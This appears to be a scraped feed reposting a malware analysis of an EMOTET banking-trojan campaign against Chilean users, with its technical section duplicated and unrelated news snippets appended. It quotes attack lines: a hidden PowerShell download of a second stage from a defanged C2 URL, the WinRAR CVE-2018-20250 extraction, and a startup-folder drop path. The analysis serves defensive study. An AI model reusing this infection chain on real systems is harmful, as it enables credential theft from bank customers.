3. Extracts EMOTET via WinRar: After the 2nd stage download (‘denuncias.rar’), the file is executed and the malware itself (‘Integrity.exe’ – EMOTET) is dropped by WinRar/ACE vulnerability onto Windows startup folder; see lines 38 – 42 in Figure 2.

  1. %ProgramFiles%\WinRAR\winRar.exe” x -y -c “%downloadpath%\%arch%” “%downloadpath%

4. Pings for delay simulation

  1. ping 127.0.0.1 -n 1 > nul

5. Reboot for malware persistence

Once the command shutdown -r is executed the Windows will reboot. This step will create the malware persistence as the EMOTET extracted from 2nd stage places it in Windows startup folder. While a normal reboot by the user would also have the same effect,  for some reason this campaign doesn’t want to wait until the user initiates the reboot.

Upon reboot, the malicious program “Integrity.exe” (EMOTET malware) gets into action and connects to the Command and Control (C&C) server.

Figure 6: Infection graph generated and extracted from Virus Total.

Interestingly, the first phase bypasses Virus Total (VT) detentions. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living of the land technique was used allowing to get fully undetectable (FUD) which is the ultimate goal for malware authors.

emotet-1

Figure 7: No detection were identified by VT.

2nd stage — The dropper uses the WinRar/ACE vulnerability to distribute EMOTET


Threat name: 25RqcZpQ3.rar / denuncias.rar
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


Looking inside the dropper, we can observe interesting artifacts.

emotet-10

Figure 8: Hex code from ‘denuncias.rar’ file — EMOTET dropper.

As shown, the string “C:../AppData\Roaming\Microsoft\Windows\Start.Menu\Programs\Startup\Integrity.exe” is found. In fact, this is the CVE-2018-20250 just saying “hello world, I’m here!” 

In detail, if UAC is running, when you attempt to extract the archive it will fail to place the malware in the “C:\ProgramData” folder due to lack of permissions. This will cause WinRAR to display an error stating “Access is denied” and “operation failed”.

On the other hand, if UAC is disable or WinRAR is run with administrator privileges it will install the malware to the next path:

  1. C:\Users\root\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe

Extracting all the files we can take and analyse the malware itself.

emotet-12

Figure 9: EMOTET malware (‘Integrity.exe”) dropped by 2nd stage.

More details on CVE-2018-20250 here.

EMOTET / Integrity.exe


Threat name: Integrity.exe
MD5: 98172becba685afdd109ac909e3a1085
SHA1: cbb0377ec81d8b120382950953d9069424fb100e
First submission: 2019-03-18 15:10:08


Deeping into the last malware infection stage, we are facing the EMOTET trojan banker — a credential stealer malware that is infecting user’s from Chile in the last months.

At the first glance, the malware is protected with the packer Themida 2.x. This is a terrible notice for malware analysts.

Unpacking Themida, especially the newer versions, is not a small task by any means. Themida uses an extremely complex virtual machine environment combined with every anti-debug and anti-analysis trick in the books, combined with many different obfuscation methods. 

In a Themida binary, different parts of the code are run in virtual machines and it obscures the behavior of the target program. The best method to unpack a VM-protected packer like Themida is to devirtualize it, which involves figuring out the entire instruction set that the packer uses and writing a script to interpret that language. 

Figure 10 shows the binary was developed in Delphi; nonetheless, we will not decompile it because Themida is very hard to unpack and that task is extremely complex.

emotet-13

Figure 10: Packer and compiler detected — Themida 2.x and Delphi.

As we can see below (Figure 11 and 12), and to reinforce the packer presence,  some sections are null name values, and other ones have high entropy (around 8.0). This is a clear signal that we are facing a challenge: Themida packer!

15

Figure 10: EMOTET section entropy.

Figure 11 below illustrates in middle that great part this file is really packed.

emotet-25

Figure 11: Emotet file entropy.

On the one hand, another perfect indicator that Themida is here is the PE file import table (IAT). The IAT is partial destroyed and just a function from kernel32.dll DLL can be observed: lstrcpy.

Figure 12: EMOTET IAT (result from Themida packer).

Dig into the details

Themida packer is, in fact, a constant challenge for malware analysts. The approach that we used to get some inspection from malware file was dump it from memory when it is running. Notwithstanding, remember that just little pieces of code are devirtualized by Themida during its execution. And kept in mind that Themida will detect anti-monitors techniques against file and registry monitors as well.

First, virtual machine need to be tuned as well as the perfect conditions to simulate the infection scenario as real as possible. For this, we need to change the system language preferences to Spain/Chile and adjust some registries in Windows Registry — malware get its values to evade possible detection.

emotet-17

Figure 13: Changes performed in HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\DESCRIPTION\System | SystemBiosDate and VideoBiosVersion registries.

But nothing is perfect. The malware verifies all time the processes are running in the system and terminates if any of them are found (this is a evade technique used by Themida packer and available here). This is one of the many features this modern packer.

  1. indicators = [
  2. “OLLYDBG”,
  3. “GBDYLLO”,
  4. “pediy06”,
  5. “FilemonClass”,
  6. “File Monitor – Sysinternals: www.sysinternals.com”,
  7. “PROCMON_WINDOW_CLASS”,
  8. “Process Monitor – Sysinternals: www.sysinternals.com”,
  9. “RegmonClass”,
  10. “Registry Monitor – Sysinternals: www.sysinternals.com”,
  11. “18467-41”,
  12. ]

Well, backing to EMOTET, and after dumping it from memory, we observed some things such as some DLLs imported and the malware strings.

Just few blocks of EMOTET can be analysed as Themida runs based on a virtual machine environment. Thus, malware functions are devirtualized in real time, and we cannot fix the IAT properly as well.

emotet-18

Figure 14: DLLs imported by EMOTET and anti-VM and anti-dbg techniques detected in this specific memory dump.

After dump it from memory, we need observe that only some DLLs are rebuild. We suspect that other ones continuing hidden. Both Anti-VM and and anti-dbg tecnhiques were again detected after dump the malware. This is not newly! 

However, some info can be extracted from the binary. When it is executed in victim’s computers,  initial info is send to C2 server (a specie of “EHLO” message with some arguments).

Figure 15: EMOTET  C2 server URL.

Information sent includes:

  • Date/hour of infection
  • Victim IP Address
  • Windows OS version
  • Antivirus name

Figure 16 presents a query performed by malware in order to identify the antivirus name running in the infected machine. Winmgmts is a WMI service within the SVCHOST process running under the “LocalSystem” account.

emotet-20

Figure 16: EMOTET collects antivirus product name via WMI query.

The file “up.php” writes all the entries to another file called “tictic.txt“. Every time  that a victim is infected, a EHLO request is send to “up.php” that writes the infection data highlighted above inside this file.

emotet-26

Figure 17: EMOTET C2 files available in a opendir.

Through this file available in an opendir C2 was possible to build an GeoMap of Threats presented at the beginning of the article.

After processing the data we detected that 1089 user’s were infected during this campaign. As pointed out, Chile, USA, Germany and France were the countries with more hits. From a total of 1089, 175 victims were impacted in Chile, 162 in USA, 137 in Germany and 132 in France.

But is important answer this question: What kind of data is collected by this trojan banker? —Banking credentials, of course.

EMOTET drops a sqlite3.dll DLL during its execution in order to use it to get data from sqlite databases from the installed popular web-browsers.

emotet-21
emotet-22

Figure 18: EMOTET collects data from main popular web-browsers.

During static analysis was also possible observe the targeted banks and financial institutions involved in this attack, namely:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile
emotet-23

Figure 19: Banks and financial institutions involved in this attack.

Figure 20 (below) shows one of the last administration panels used by EMOTET in its recent infections.

monitor

Figure 20: Administration panel used in recent variants by EMOTET.

Another interesting aspect is the following string observed in past EMOTET infections and hardcoded inside many malware samples.

  1. C:\Projects\Pe indetectavel D2007\comps\TMSv7\AdvEdDD.pas

This is a drag’n’drop interface support file for Delphi 5,6,7,2005,2006 & C++Builder. We could not retrieve any more information about this library in malware.

During this analysis we detect that malware performs several connections to “www.bing.com” — maybe to validate a successful connection to the Internet.

emotet-24

Figure 21: Internet connection is validated during EMOTET execution.

Curious that after several memory dumps we detect some interesting strings are changing in memory. In a specific moment we get the following:

  1. 75EE6DE16BB9D5BE439A3EF523A83AFA
  2. BICE
  3. C852CE43C4D6371C2DA82AD878D20420
  4. 64FF1C0E1F0D0962E878D57DAAF36980E903B51530D0
  5. B2ADBB5BD210030E1B6C82E6524BA740EE6D9E
  6. 2E29C77CA62FA75D8ADC7FB690C8D87B9732E37C97B84983D8CF5F9449ED
  7. BBVA
  8. 50C560964C889B83EF71E713C11243F21DBE6FBE4A85A922
  9. 212DC56494CF022FDC79D7B3B214B971D8123297FD003291CF
  10. D97482A059F06188A526A28681C20823
  11. C650E40229AAF90830A3AD
  12. ITA
  13. CC57EF022BAC2F04297BF728CFF324C360E71EBC6183A5
  14. 8C94A257F056F65CF1205A8AAD918191B71DCA013EDE01
  15. 64F00236E66EFC240866E60A359A
  16. A1A85B9C5CF95BF72775C2A6AE29A75C8297AF20C4788ACC075B83
  17. SANTA
  18. 5DF40FD0084580AA52405E3A3AA221D30A1F37A95287BB1EB42DD1BC43F3053D94
  19. 59F50E2BDC72D5BEA7F50B28D00D4C3BC71CCF759C4AFD57FF171431D91EDB
  20. 64FF34F315499D
  21. B8509C5B8C9E2B00094487BD65E173B198F054A743F007425490BF6394AD44E47CA48587AE4DEE03
  22. AAB671B06FE66981B8EA2B0F17419F548A9FB728DC1022A43F9348252BCB6D95CC
  23. ACB74CEB034053DD01418280A72FA253
  24. CORP
  25. D945F333DA788E49F161F622046DE2023C9E489846
  26. ESTADO
  27. 5FF80F2CC30175A35487D80C6A83D81CC60334A45233FC294485A049F139
  28. 8E89BF7FAE2C42FE3F92C571D71146EF2AAC5E8E4829F6235383BF6E8CF4023C6AFCAB55FB08
  29. BCA75C9BB21066924B9E30DBBD32AB5883C768E41FD065EC78DC
  30. 3FD86F8CA3215583BB2FA05432BB11D5025201538CED60F95CF911C96883
  31. 61FA0926C5077FB962F16590F61D0D053B9E5488B15296
  32. 948FA545E466B551FA295F83AA2EA3
  33. CHILE
  34. 2A23DD01389537D30B19A68282DA798BB3E60E42282AC11FBD14
  35. 50F926C264D2C1599E3E90F464BD30C67CEA1F0E38DCAFC619B56C9C
  36. 8C85A145F565E248C11DBE759C29BA79
  37. BE87512029A426D375DA0FC6A02474E10A4DF5543EE31A0E67F82CD578
  38. 2F28DC1A31928188A723
  39. BCI
  40. 9883B34C36AB2B0061B3CB7DAB27BC6781C1
  41. 64FF36CEA2C015CC0C4984A1534AF640CB18C316CFAEA333AA
  42. FB679F58344B8BB06FE6698E4789C86BC20A6F80AB5BED69BF35D60D
  43. B1AA5996B517041CCD034BF925A02A
  44. SECU
  45. 44DF14D37BD8CB59F65181A74B8ECA7BEE3AD90A32D465B121B8964E7FB543E83FEE4EF826D91EC7789AB12B5E83EE13B563F831CC
  46. FALA
  47. F36F85A24A8B9895BA1545E30F429E57
  48. F41C28DE021050FE2AAD13C6A0CE0431C81FDD
  49. WebPay
  50. 2727D96DF161E9
  51. E9649C5E983093BF6BAB3CEF1B0277B49D3EE66085B685C1074E8CA04E36C264B2698BBD6C8AFD34EF53F36D9A4FFD5383A9FD1725D7134124
  52. ServiPag
  53. F8152FF02BA624CE7A9ACE7AA1
  54. 2932CE659F24BA6287D97AA98F3565F01BBC65E54CDE11B41FBF6F9CBE75B8
  55. SCOTI
  56. A8B67C8CB629BD7AD62EA85D89D77B8BB7

This seems a encrypted strings with specific information about banking systems (maybe, endpoints — we don’t know).

One way to understand the malware totally is devirtualize all entire code. As shown, Themida packer make harder the malware analysis and that was a big challenge during this investigation.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published by Pedro Tavares.

About the author Pedro Tavares 

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the security computer blog segurancainformatica.pt.

Pierluigi Paganini

(SecurityAffairs – EMOTET malware, hacking)

The post [SI-LAB] EMOTET spread in Chile impacted hundreds of users and targeted financial and banking services appeared first on Security Affairs.

Security Affairs: [SI-LAB] EMOTET spread in Chile impacted hundreds of users and targeted financial and banking services

EMOTET spread in Chile targeted financial and banking services. SI-LAB detected hundreds of users that were impacted by this malware between March 18th and 26th of 2019.

The last days of March 2019 are making headlines due to a targeted cyber attack involving a new variant of infamous EMOTET malware. This threat is known as a banking trojan malware that collects financial information by injecting malicious code into a computer.

EMOTET has evolved in its delivery, however, this wave was conducted with the most prominent form: inserting malicious documents or URL links inside the body of an email sometimes disguised as an invoice or PDF attachment.

According to SI-LAB, a total of 176 users from Chile were affected in a broad cyber threat occurred between March 18th and 26th of 2019. Once again, the main goal of this campaign involving EMOTET had the propose of exfiltrating financial credentials from user’s computers to access financial and banking services geolocated in Chile.

The first phase identified as “__Denuncia_Activa_CL.PDF.bat” is responsible for operating a crucial part of this threat. That file was delivered via malscam campaigns around the world and its source-code is obfuscated in order to evade antivirus detection and complicate its analysis.

Interestingly, the first phase bypasses Virus Total (VT) detentions. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living of the land technique was used allowing to get fully undetectable (FUD) which is the ultimate goal for malware authors.

The .bat file is a Windows batch script that is responsible for downloading a second script from the Command & Control (C&C) server. The latter leverages the WinRar/Ace vulnerability (CVE-2018-20250) dropping the malware itself into the Windows startup folder. Next, the infected machine will reboot and malware becomes persistent in the system startup.

The high-level workflow this campaign is illustrated below.

emotet-diagram

EMOTET was protected with an extreme commercial packer dubbed Themida. Themida introduced an additional protection layer that made it harder to analyze. Other restrictions were also coded to prevent its execution in different types of scenarios. In this case, for instance, malware authors introduced several anti-run specifications related to victims’ geolocation and language preferences — only Spain/Chile computers were compromised.

Themida packer has a large group of specific features that are very appreciated by criminals to protect their threats. For example, it uses VM-protection techniques, debug-protection, virtual machine emulation, anti-monitors techniques, anti-memory patching (see all Themida features here).

The first alert related to this wave was observed on March 22nd by The Computer Security Certified Response Team (CSIRT), of the Ministry of the Interior from Chile.

“Preliminary information collected allows us to determine that the following URLs and the following IP addresses must be blocked, unless otherwise indicated,” the CSIRT Ministry of the Interior states.

“Based on information obtained from internal sources, the cybersecurity alert situation was identified by an incident related to malicious software called EMOTET affected by the relevant sectors of the economy” – CSIRT Chile.

CSIRT released a comprehensive list of IP addresses that EMOTET signals had to block. A national alert was sent (below) and can be consulted in this URL.

communication

SI-LAB detected that this attack started some days before the alerts were published. Thesecond malware phase (denuncias.rar); which used WinRar/Ace vulnerability (CVE-2018-20250) to drop the malware itself was uploaded by criminals to the opendir C2 server on March 18th, 2019. We can note below, in Technical  Analysis, that the malware was uploaded again later into another web folder on March 21st — maybe an update/change performed by its operators to improve their functionalities or to fix some bug.

emotet-3

As aforementioned, EMOTET only executes inside victim’s computers with Spain/Chile configured as their primary language and this can be an indicator that points to a global target attack.

After several rounds to understand the malware, we found that some Chile financial and banking organizations were targeted, including:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile
emotet-4

When the malware is executed without any restrictions, i.e., upon a non-virtualized environment, some information from the victim’s computer is send to C2 server. Data includes date/hour of infectionremote IP from victim’s computer, OS version andantivirus name.

emotet-5

This information was available online on the opendir C2 server and SI-LAB analysed data in order to understand the total of infections and victims impacted this malicious targeted attack.

In detail, we found that 1089 users were impacted by this malware between March 18th and 26th, 2019.

We built a GeoMap of Threats that aggregates the victims’ IP addresses, based on their geolocation, that were collected from all the data in the opendir C2 server. Color intensity is correlated with the number of infections, being the darkest red equivalent to 175 infections in Chile.

GeoMap of Threats

EMOTET Victims of Cyber Threat in Chile

As indicated on the GeoMap of Threats, Chile, USA, Germany and France were the countries with most hits observed by SI-LAB. From a total of 1089 infections, 175 victims were impacted in Chile, 162 in USA, 137 in Germany and 132 in France.

Governmental agency CSIRT and Cybersecurity National System from Chile are currently fighting this growing threat and have been working on increasing awareness among users in the country. They encourage users to stay tuned for their computer security alerts.

For more details and complete analysis of this malicious campaign see the Technical Analysis below.

Technical Analysis


Threat name: __Denuncia_Activa_CL.PDF.bat
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


The last weeks of March 2019 were underlined for the bad reasons — a global cyber threat targeted financial institutions and banks from Chile via EMOTET banking trojan malware.

This campaign was conducted via an initial malscan wave adding malicious documents or URL links inside the body of an email sometimes disguised as an invoice or PDF attachment.

According to SI-LAB, 1089 users where impacted by this wave; 176 only in Chile. This malware is not new and, once gain, the main goal was exfiltration of credentials from user’s to access financial and banking services geolocated in Chile.

The first malware phase identified as “__Denuncia_Activa_CL.PDF.bat” is seen as the maestro of all operations strictly well-planed by criminals. This file was delivered via malscam campaigns around the world and its code is obfuscated in order to evade antivirus detection and make harder its analysis. Figure 1 (below) shows the batch script encoded in Little-endian UTF-16.

emotet-6

Figure 1: EMOTET malware obfuscated (encoded in Little-endian UTF-16) — the first phase.

After some rounds was possible to get the malware source-code in ASCII. Let’s look below.

Figure 2: EMOTET malware deobfuscated — the first phase.

In general, the malicious batch script performs the following actions:

1. Generates random name to rename the 2nd stage (dropper)

First, the malware generates a random name to rename the 2nd file downloaded from C2 server (the stage that executes the WinRar/Ace vulnerability — CVE-2018-20250). The latter will drop the EMOTET itself onto the Windows startup folder (discussed later).

In detail, on lines 33, 34 and 35 we can observe that the second stage is download to the victim’s download folder. Next image presents the output generated from the batch file.

emotet-8__

Figure 3: Malware source-code output – the first phase.

2. Drops 2nd stage: PowerShell command is executed to drop the WinRar exploit ‘denuncias.rar’ file.

  1. PowerShell -windowstyle hidden -Command “(New-Object Net.WebClient).DownloadFile(‘%downloadurl%’

The 2nd stage is downloaded from C2 server and is renamed (“25RqcZpQ3.rar”) and placed into “C:\Users\root\Downloads” folder.

emotet-9

Figure 4: Download path – the first phase.

As shown, this file is downloaded from an opendir C2 server. Note that C2 server has available this file in two different directories, namely:

  1. http://www.triosalud[.]cl/wp/wp-content/uploads/2019/02/denuncias.rar
  2. http://www.triosalud[.]cl/wp/wp-content/uploads/2019/03/denuncias.rar (URL hardecoded in 1st stage of malware)
emotet-3
emotet-11

Figure 5: 2nd stage available to download in two different directories.

3. Extracts EMOTET via WinRar: After the 2nd stage download (‘denuncias.rar’), the file is executed and the malware itself (‘Integrity.exe’ – EMOTET) is dropped by WinRar/ACE vulnerability onto Windows startup folder; see lines 38 – 42 in Figure 2.

  1. %ProgramFiles%\WinRAR\winRar.exe” x -y -c “%downloadpath%\%arch%” “%downloadpath%

4. Pings for delay simulation

  1. ping 127.0.0.1 -n 1 > nul

5. Reboot for malware persistence

Once the command shutdown -r is executed the Windows will reboot. This step will create the malware persistence as the EMOTET extracted from 2nd stage places it in Windows startup folder. While a normal reboot by the user would also have the same effect,  for some reason this campaign doesn’t want to wait until the user initiates the reboot.

Upon reboot, the malicious program “Integrity.exe” (EMOTET malware) gets into action and connects to the Command and Control (C&C) server.

Figure 6: Infection graph generated and extracted from Virus Total.

Interestingly, the first phase bypasses Virus Total (VT) detentions. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living of the land technique was used allowing to get fully undetectable (FUD) which is the ultimate goal for malware authors.

emotet-1

Figure 7: No detection were identified by VT.

2nd stage — The dropper uses the WinRar/ACE vulnerability to distribute EMOTET


Threat name: 25RqcZpQ3.rar / denuncias.rar
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


Looking inside the dropper, we can observe interesting artifacts.

emotet-10

Figure 8: Hex code from ‘denuncias.rar’ file — EMOTET dropper.

As shown, the string “C:../AppData\Roaming\Microsoft\Windows\Start.Menu\Programs\Startup\Integrity.exe” is found. In fact, this is the CVE-2018-20250 just saying “hello world, I’m here!” 

In detail, if UAC is running, when you attempt to extract the archive it will fail to place the malware in the “C:\ProgramData” folder due to lack of permissions. This will cause WinRAR to display an error stating “Access is denied” and “operation failed”.

On the other hand, if UAC is disable or WinRAR is run with administrator privileges it will install the malware to the next path:

  1. C:\Users\root\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe

Extracting all the files we can take and analyse the malware itself.

emotet-12

Figure 9: EMOTET malware (‘Integrity.exe”) dropped by 2nd stage.

More details on CVE-2018-20250 here.

EMOTET / Integrity.exe


Threat name: Integrity.exe
MD5: 98172becba685afdd109ac909e3a1085
SHA1: cbb0377ec81d8b120382950953d9069424fb100e
First submission: 2019-03-18 15:10:08


Deeping into the last malware infection stage, we are facing the EMOTET trojan banker — a credential stealer malware that is infecting user’s from Chile in the last months.

At the first glance, the malware is protected with the packer Themida 2.x. This is a terrible notice for malware analysts.

Unpacking Themida, especially the newer versions, is not a small task by any means. Themida uses an extremely complex virtual machine environment combined with every anti-debug and anti-analysis trick in the books, combined with many different obfuscation methods. 

In a Themida binary, different parts of the code are run in virtual machines and it obscures the behavior of the target program. The best method to unpack a VM-protected packer like Themida is to devirtualize it, which involves figuring out the entire instruction set that the packer uses and writing a script to interpret that language. 

Figure 10 shows the binary was developed in Delphi; nonetheless, we will not decompile it because Themida is very hard to unpack and that task is extremely complex.

emotet-13

Figure 10: Packer and compiler detected — Themida 2.x and Delphi.

As we can see below (Figure 11 and 12), and to reinforce the packer presence,  some sections are null name values, and other ones have high entropy (around 8.0). This is a clear signal that we are facing a challenge: Themida packer!

15

Figure 10: EMOTET section entropy.

Figure 11 below illustrates in middle that great part this file is really packed.

emotet-25

Figure 11: Emotet file entropy.

On the one hand, another perfect indicator that Themida is here is the PE file import table (IAT). The IAT is partial destroyed and just a function from kernel32.dll DLL can be observed: lstrcpy.

Figure 12: EMOTET IAT (result from Themida packer).

Dig into the details

Themida packer is, in fact, a constant challenge for malware analysts. The approach that we used to get some inspection from malware file was dump it from memory when it is running. Notwithstanding, remember that just little pieces of code are devirtualized by Themida during its execution. And kept in mind that Themida will detect anti-monitors techniques against file and registry monitors as well.

First, virtual machine need to be tuned as well as the perfect conditions to simulate the infection scenario as real as possible. For this, we need to change the system language preferences to Spain/Chile and adjust some registries in Windows Registry — malware get its values to evade possible detection.

emotet-17

Figure 13: Changes performed in HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\DESCRIPTION\System | SystemBiosDate and VideoBiosVersion registries.

But nothing is perfect. The malware verifies all time the processes are running in the system and terminates if any of them are found (this is a evade technique used by Themida packer and available here). This is one of the many features this modern packer.

  1. indicators = [
  2. “OLLYDBG”,
  3. “GBDYLLO”,
  4. “pediy06”,
  5. “FilemonClass”,
  6. “File Monitor – Sysinternals: www.sysinternals.com”,
  7. “PROCMON_WINDOW_CLASS”,
  8. “Process Monitor – Sysinternals: www.sysinternals.com”,
  9. “RegmonClass”,
  10. “Registry Monitor – Sysinternals: www.sysinternals.com”,
  11. “18467-41”,
  12. ]

Well, backing to EMOTET, and after dumping it from memory, we observed some things such as some DLLs imported and the malware strings.

Just few blocks of EMOTET can be analysed as Themida runs based on a virtual machine environment. Thus, malware functions are devirtualized in real time, and we cannot fix the IAT properly as well.

emotet-18

Figure 14: DLLs imported by EMOTET and anti-VM and anti-dbg techniques detected in this specific memory dump.

After dump it from memory, we need observe that only some DLLs are rebuild. We suspect that other ones continuing hidden. Both Anti-VM and and anti-dbg tecnhiques were again detected after dump the malware. This is not newly! 

However, some info can be extracted from the binary. When it is executed in victim’s computers,  initial info is send to C2 server (a specie of “EHLO” message with some arguments).

Figure 15: EMOTET  C2 server URL.

Information sent includes:

  • Date/hour of infection
  • Victim IP Address
  • Windows OS version
  • Antivirus name

Figure 16 presents a query performed by malware in order to identify the antivirus name running in the infected machine. Winmgmts is a WMI service within the SVCHOST process running under the “LocalSystem” account.

emotet-20

Figure 16: EMOTET collects antivirus product name via WMI query.

The file “up.php” writes all the entries to another file called “tictic.txt“. Every time  that a victim is infected, a EHLO request is send to “up.php” that writes the infection data highlighted above inside this file.

emotet-26

Figure 17: EMOTET C2 files available in a opendir.

Through this file available in an opendir C2 was possible to build an GeoMap of Threats presented at the beginning of the article.

After processing the data we detected that 1089 user’s were infected during this campaign. As pointed out, Chile, USA, Germany and France were the countries with more hits. From a total of 1089, 175 victims were impacted in Chile, 162 in USA, 137 in Germany and 132 in France.

But is important answer this question: What kind of data is collected by this trojan banker? —Banking credentials, of course.

EMOTET drops a sqlite3.dll DLL during its execution in order to use it to get data from sqlite databases from the installed popular web-browsers.

emotet-21
emotet-22

Figure 18: EMOTET collects data from main popular web-browsers.

During static analysis was also possible observe the targeted banks and financial institutions involved in this attack, namely:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile
emotet-23

Figure 19: Banks and financial institutions involved in this attack.

Figure 20 (below) shows one of the last administration panels used by EMOTET in its recent infections.

monitor

Figure 20: Administration panel used in recent variants by EMOTET.

Another interesting aspect is the following string observed in past EMOTET infections and hardcoded inside many malware samples.

  1. C:\Projects\Pe indetectavel D2007\comps\TMSv7\AdvEdDD.pas

This is a drag’n’drop interface support file for Delphi 5,6,7,2005,2006 & C++Builder. We could not retrieve any more information about this library in malware.

During this analysis we detect that malware performs several connections to “www.bing.com” — maybe to validate a successful connection to the Internet.

emotet-24

Figure 21: Internet connection is validated during EMOTET execution.

Curious that after several memory dumps we detect some interesting strings are changing in memory. In a specific moment we get the following:

  1. 75EE6DE16BB9D5BE439A3EF523A83AFA
  2. BICE
  3. C852CE43C4D6371C2DA82AD878D20420
  4. 64FF1C0E1F0D0962E878D57DAAF36980E903B51530D0
  5. B2ADBB5BD210030E1B6C82E6524BA740EE6D9E
  6. 2E29C77CA62FA75D8ADC7FB690C8D87B9732E37C97B84983D8CF5F9449ED
  7. BBVA
  8. 50C560964C889B83EF71E713C11243F21DBE6FBE4A85A922
  9. 212DC56494CF022FDC79D7B3B214B971D8123297FD003291CF
  10. D97482A059F06188A526A28681C20823
  11. C650E40229AAF90830A3AD
  12. ITA
  13. CC57EF022BAC2F04297BF728CFF324C360E71EBC6183A5
  14. 8C94A257F056F65CF1205A8AAD918191B71DCA013EDE01
  15. 64F00236E66EFC240866E60A359A
  16. A1A85B9C5CF95BF72775C2A6AE29A75C8297AF20C4788ACC075B83
  17. SANTA
  18. 5DF40FD0084580AA52405E3A3AA221D30A1F37A95287BB1EB42DD1BC43F3053D94
  19. 59F50E2BDC72D5BEA7F50B28D00D4C3BC71CCF759C4AFD57FF171431D91EDB
  20. 64FF34F315499D
  21. B8509C5B8C9E2B00094487BD65E173B198F054A743F007425490BF6394AD44E47CA48587AE4DEE03
  22. AAB671B06FE66981B8EA2B0F17419F548A9FB728DC1022A43F9348252BCB6D95CC
  23. ACB74CEB034053DD01418280A72FA253
  24. CORP
  25. D945F333DA788E49F161F622046DE2023C9E489846
  26. ESTADO
  27. 5FF80F2CC30175A35487D80C6A83D81CC60334A45233FC294485A049F139
  28. 8E89BF7FAE2C42FE3F92C571D71146EF2AAC5E8E4829F6235383BF6E8CF4023C6AFCAB55FB08
  29. BCA75C9BB21066924B9E30DBBD32AB5883C768E41FD065EC78DC
  30. 3FD86F8CA3215583BB2FA05432BB11D5025201538CED60F95CF911C96883
  31. 61FA0926C5077FB962F16590F61D0D053B9E5488B15296
  32. 948FA545E466B551FA295F83AA2EA3
  33. CHILE
  34. 2A23DD01389537D30B19A68282DA798BB3E60E42282AC11FBD14
  35. 50F926C264D2C1599E3E90F464BD30C67CEA1F0E38DCAFC619B56C9C
  36. 8C85A145F565E248C11DBE759C29BA79
  37. BE87512029A426D375DA0FC6A02474E10A4DF5543EE31A0E67F82CD578
  38. 2F28DC1A31928188A723
  39. BCI
  40. 9883B34C36AB2B0061B3CB7DAB27BC6781C1
  41. 64FF36CEA2C015CC0C4984A1534AF640CB18C316CFAEA333AA
  42. FB679F58344B8BB06FE6698E4789C86BC20A6F80AB5BED69BF35D60D
  43. B1AA5996B517041CCD034BF925A02A
  44. SECU
  45. 44DF14D37BD8CB59F65181A74B8ECA7BEE3AD90A32D465B121B8964E7FB543E83FEE4EF826D91EC7789AB12B5E83EE13B563F831CC
  46. FALA
  47. F36F85A24A8B9895BA1545E30F429E57
  48. F41C28DE021050FE2AAD13C6A0CE0431C81FDD
  49. WebPay
  50. 2727D96DF161E9
  51. E9649C5E983093BF6BAB3CEF1B0277B49D3EE66085B685C1074E8CA04E36C264B2698BBD6C8AFD34EF53F36D9A4FFD5383A9FD1725D7134124
  52. ServiPag
  53. F8152FF02BA624CE7A9ACE7AA1
  54. 2932CE659F24BA6287D97AA98F3565F01BBC65E54CDE11B41FBF6F9CBE75B8
  55. SCOTI
  56. A8B67C8CB629BD7AD62EA85D89D77B8BB7

This seems a encrypted strings with specific information about banking systems (maybe, endpoints — we don’t know).

One way to understand the malware totally is devirtualize all entire code. As shown, Themida packer make harder the malware analysis and that was a big challenge during this investigation.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published by Pedro Tavares.

About the author Pedro Tavares 

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the security computer blog seguranca–informatica.pt.

Pierluigi Paganini

(SecurityAffairs – EMOTET malware, hacking)

The post [SI-LAB] EMOTET spread in Chile impacted hundreds of users and targeted financial and banking services appeared first on Security Affairs.



Security Affairs

Cyberattacks becoming more costly and focused, UK government figures show

By Jon Abbott, CEO at ThreatAware, While fewer businesses are suffering cyberattacks or breaches, attacks are becoming more costly and targeted, according to the latest government figures released today. The

The post Cyberattacks becoming more costly and focused, UK government figures show appeared first on The Cyber Security Place.

E Hacking News – Latest Hacker News and IT Security News: UK : Social Media Executives To Be Held Accountable For Destructive Content!



Reports have it, that according to a recent proposal of the UK authorities, social media executives shall be personally blamable for the harmful content on their platforms.
The freshly published paper in which the details were mentioned is just a tactic to restrict the spread of violent and detrimental content related to suicides and cyber bullying.
Disinformation, is another theme eluded upon along with the rising need for companies to hold their ground against terroristic, child abusive, and sexually abusive content.
The regulations and guidelines in the aforementioned paper also mention the requirement for every individual regulator to impose the rules.
Its’s high time, the online companies took responsibility for what content their platforms displayed, in an attempt to reinstate trust in technology within the society.
Files hosting sites, chat forums, messaging services, search engines and social media platforms alike will come under the belt of the aforementioned measures.
If not adhered to, the policies also mention within them strong punishments for companies including substantial fines and blocking access.
This is a great action which has potential to bring change. The implementation although could not be as simple as it all sounds.
The above-mentioned set of guidelines would provide for a stable code of conduct for everyone on the social media which if complied to, will lead to safer platforms.
